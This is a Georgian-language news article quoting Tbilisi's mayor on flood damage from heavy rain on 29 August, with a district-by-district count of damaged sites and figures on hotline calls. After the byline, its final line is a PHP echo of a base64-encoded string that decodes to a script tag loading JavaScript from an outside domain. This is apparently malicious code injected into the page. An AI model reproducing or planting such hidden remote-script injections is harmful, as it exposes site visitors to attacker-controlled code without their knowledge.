celsiusi
ავერსი საქკაბელი

თბილისის მერის კახა კალაძის განცხადებით, 29 აგვისტოს თბილისში მოსული უხვი ნალექის შედეგად, ინფრასტრუქტურა 300-მდე მისამართზე დაზიანდა.

როგორც მან მთავრობის სხდომაზე განაცხადა, ცხელი ხაზი, გამგეობებისა და საქალაქო სამსახურების წარმომადგენლები საგანგებო რეჟიმში მუშაობდნენ.

„29 აგვისტოს მოსულმა უხვმა ნალექმა ძალიან დიდი პრობლემა შექმნა დედაქალაქის ზოგიერთ რაიონში, კონკრეტულ უბნებში. როგორც დარგის სპეციალისტები ამბობენ, ამ სამ საათში მოსულმა ნალექმა, მოცულობით მინიმუმ ორჯერ გადააჭარბა 2015 წლის 13 ივნისს მოსულ ნალექს. სტიქიის შედეგად დაზიანდა სახურავები, სადარბაზოები, შლამით გადაივსო სანიაღვრე და წყალარინების ქსელები, ასევე, დაზიანდა გრუნტის დამჭერი კედლები, განსაკუთრებით ნაძალადევის რაიონში.

რამდენიმე კერძო სახლიდან, მათი ავარიულობის გამო, გავიყვანეთ ადგილობრივი მცხოვრებლები.
მთელი ღამის განმავლობაში, ჩვენი სამსახურების, გამგეობების წარმომადგენლები მაქსიმალურად ყველაფერს აკეთებდნენ იმისთვის, რომ დახმარებოდნენ ყველა იმ ადამიანს, ვისაც პრობლემა შეექმნა. 29 აგვისტოს 21:00 საათიდან 30 აგვისტოს დღის ბოლომდე, უამინდობასთან დაკავშირებით, ცხელ ხაზზე 600-ზე მეტი შეტყობინება შემოვიდა. არცერთი შეტყობინება რეაგირების გარეშე არ დაგვიტოვებია“, - აღნიშნა კახა კალაძემ.

მისივე თქმით, დაზიანებული ინფრასტრუქტურა უახლოეს პერიოდში მოწესრიგდება და აღდგება.

„რაიონების მიხედვით, დაზიანებული ობიექტები განაწილდა შემდეგნაირად: გლდანი - 136; ნაძალადევი - 114; საბურთალო - 92; ვაკე - 78; სამგორი - 65; დიდუბე - 49; ისანი - 30; მთაწმინდა - 24; კრწანისი - 19; ჩუღურეთი - 19. საჭიროა ჩვენი მხრიდან ჩართულობა, მოწესრიგება, კონკრეტული პროექტების განხორციელება. თანხა უკვე გამოყოფილია და ყველაფერი მოწესრიგდება“, - განაცხადა თბილისის მერმა.

ავტორი
მირანდა შურღაია
646
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");